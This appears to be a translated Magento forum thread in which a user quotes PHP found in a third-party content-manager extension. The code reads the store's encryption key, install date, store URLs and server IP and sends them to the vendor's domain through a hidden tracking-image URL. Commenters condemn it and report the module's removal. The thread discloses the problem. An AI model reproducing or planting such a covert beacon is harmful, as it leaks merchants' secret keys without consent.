原谅我的无知,但是使用加密密钥解密Magento数据,对吗?模块有什么充分的理由来访问它吗?安装高级内容管理器后,我偶然发现了这段代码。
<div id="banana-tracker">
<?php
$stores = Mage::app()->getStores();
$key = (string)Mage::getConfig()->getNode('global/crypt/key');
$date = (string)Mage::getConfig()->getNode('global/install/date');
$serverIp = $_SERVER['SERVER_ADDR'];
$params = 'key='.$key.'&date='.$date.'&';
foreach($stores as $store)
{
$params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
}
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />
3
这个。是。可怕。没有理由泄漏您的加密密钥。
—
Fabian Blechschmidt 2015年
这很糟糕,非常糟糕。
—
AnnaVölkl'3
好赶上!这非常糟糕……
—
桑德·曼格尔
感谢@Sander告诉我们。它已从Connect中删除。
—
2015年
@benmarks很高兴听到这个消息。出于显而易见的原因,这也令人非常失望,因为该应用程序给人留下了深刻的印象,而开发人员在过去一直非常乐于助人和迅速。
—
TylersSN 2015年